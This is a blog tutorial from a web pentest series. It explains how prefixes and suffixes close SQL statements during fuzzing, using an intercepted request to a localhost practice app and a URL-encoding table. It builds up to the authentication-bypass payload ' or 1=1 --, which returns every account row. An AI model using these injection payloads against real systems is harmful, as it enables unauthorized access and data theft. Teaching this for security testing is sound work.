Thursday, February 13, 2014

Web App Pentest - Part 4 Suffix & Prefix in Fuzzing

In this series of article, last time we talked about the fuzzing and various SQL statement special characters which can be used in fuzzing the web application. In this article I am going to focus on various prefixes and suffix of fuzzing in order to fuzz the target web application.

Suffix Syntax – AlphabeticsSpecialcharacters (It means alphabetic followed by special characters. We put special characters at the end that is why it is called as a suffix.)
            E.g: jonnybravo (Where jonnybravo is a character and ‘ is a special character.)

Prefix Syntax – SpecialcharactersAlphabetics (It means special characters followed by alphabets. We put special characters on the starting that is why it is called as prefix.)
     E.g: jonnybravo  (Where jonnybravo is a character and ‘ is a special character.)

Picking the suffix example and giving it to the authentication and watching the result. Below picture shows the result when I gave jonnybravo’ in the username.

Figure 1 My input string jonnybravo

GET /chintan/index.php?page=user-info.php&username=jonnybravo%27&password=&user-info-php-submit-button=View+Account+Details HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:27.0) Gecko/20100101 Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/chintan/index.php?page=user-info.php
Cookie: showhints=0; PHPSESSID=39hb01vtdib9sov8rmmfok7kn2
Connection: keep-alive

Encoding of Special Characters in URL

After giving that input string I intercepted request and came to know that browsers encodes my input as in specific format of URL. So ‘ changed to %27 and then it sent to server via browser. Likewise, here is the list of all those special characters from your keyboards and their relevant conversation in specific browser URL format.

! - %21

@ - %40

# - %23

$ - %24

^ - %5e

& - %26

* - %2a

( - %28

) - %29

{ - %7b

} - %7d

 - - %2d

+ - 2b

[ - %5b

] - %5d

; - %3b

: - %3a

\ - %5c

| - %7c

, - %2c

< - %3c

. - %2e

> - %3e

/ - %2f

? - %3f

Once I forwarded request I have got error page as the username is not legitimate. Here is the page.

So from above error page we can identify in message box that jonnybravo’ is our injection. Let us analyze the Query which is shown in message box. Query is as follows:

Query: SELECT username FROM accounts WHERE username='jonnybravo'';

By looking at this query we may straightaway come to know that we need suffix and prefix in order to finish the query itself. Let me illustrate this by writting this query in below format.

Query: SELECT username FROM accounts WHERE username='jonnybravo'';

We are giving ‘ in order to complete the SQL statement. So once I give jonnybravo’ then the suffix ‘ and the ‘ which comes before jonnybravo completes the syntax format.  You can clearly see that starting and ending ‘ are provided by server query but we want to add one more so that our ‘ finishes the statement query and then the remaining additional one lies as it is which may cause an error while executing this query because it is additional not being used and it is not correct as per the SQL query syntax. So the one we put after jonnybravo finishes the query syntax by working with the initial one ‘ provided by server before jonnybravo and the  remaining one provided by the server is useless because syntax is already finished with our one and that additional one causes error.

“ If we don’t close, then no matter whatever you give in your injection. It will never work out and you will never get error page.”

This is the only username lookup page so you may get this query in backend to run. Let us move on authentication page so we may see username and password field in query. Query is as follows. I gave jonnybravo’ as a username and momma as a password. So we add suffix ‘ in this username and password remained simple plaintext. Sometimes we need both in order to pass our injection. Let us follow below query.

Query: SELECT * FROM accounts WHERE username='jonnybravo'' AND password='momma'

Let us suppose that we want to get rid of highlighted sentence which is AND password=’momma’. So how can we do that. So I am going to use ‘ as a prefix and (space)--  as a suffix. Main reason of using (space)-- this is because this is MYSQL server, so when we give (space)-- it is considered as a comment notation. So whatever we write after this will be consider as a comment and server will ignore that part of the query.

Injection -  ‘ --

Then we can add our payload in between this such as or 1=1’. So our final injection will look like below.

Injection -  ‘ or 1=1’ --

Once I give this injection to the username field. Generated error looks like below pic.

Analyzing our injection then we gave first prefix ‘ which completes the username field. Username is passing ‘ ‘ from server but in between that we are giving our injection so it becomes ‘ or 1=1’ -- where yellow marked quotes are passed by server only and red one is our injection. Now simplifying it, if we consider first two ‘ ‘ then it completes the username field. ‘ ‘ or 1=1’ -- . So prebuilt ‘ from server and one of our ‘ makes the complete ‘’ for username field. Now analyzing further query then it is as follows.

Username=‘ ‘ or 1=1’ -- AND password=’ ’. As I already mentioned earlier that this is MYSQL server so whatever comes after (space)--is considered as a comment. So commenting further query would be look like below.

Username=‘ ‘ or 1=1’ -- ‘ AND password=’ ’. Now simplifying this query in detail. Only thing remaining in our query is or 1=1’ because after that everything is in comment which is highlighted in cian colour and before that ‘ ’ completes the sentence.  So this is how you can use suffix and prefix in SQL injection. Now I have put one more ‘ after 1=1 in order to bring error on the page. If I remove that extra ‘ then this injection will work and we will be able to inject the application successfully as everyone knows 1=1 so that logic can not be refused by a server and server executes that query. So My final injection becomes ‘ or 1=1 -- and giving this query into the username field gave me below result.

As you can see server executed our injection and it gave all the results stored in the database. It brings all the results from the entire table.

So, in this article I introduced you suffix and prefix and how to use them in order to complete the SQL statement in order to get our injection executed by the server does not matter whether it is MYSQL server or any other server. In my next article of this series I will focus on getting our payload executed while playing with HTML tags.


No comments: